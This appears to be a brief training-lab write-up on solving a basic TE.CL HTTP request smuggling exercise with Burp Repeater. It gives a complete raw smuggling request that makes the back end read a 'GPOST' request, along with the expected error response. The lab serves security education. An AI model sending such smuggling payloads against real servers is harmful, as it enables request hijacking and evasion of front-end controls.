HTTP request smuggling, basic TE.CL vulnerability
Description
This lab involves a front-end and back-end server, and the two servers handle duplicate HTTP request headers in different ways. The front-end server rejects requests that aren’t using the GET or POST method.
Reproduction and proof of concept
In Burp Suite, disable the Autoupdate content length in Repeater (in the topmost menu row)
Using Burp Repeater, issue the following request twice:
POST / HTTP/1.1
Host: lab-id.web-security-academy.net
Content-Type: application/x-www-form-urlencoded
Content-length: 4
Transfer-Encoding: chunked
5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
x=1
0
The second (or third) response should say: Unrecognized method GPOST
.
Exploitability
An attacker will need to smuggle a request to the back-end server, so that the next request processed by the back-end server appears to use the method GPOST
.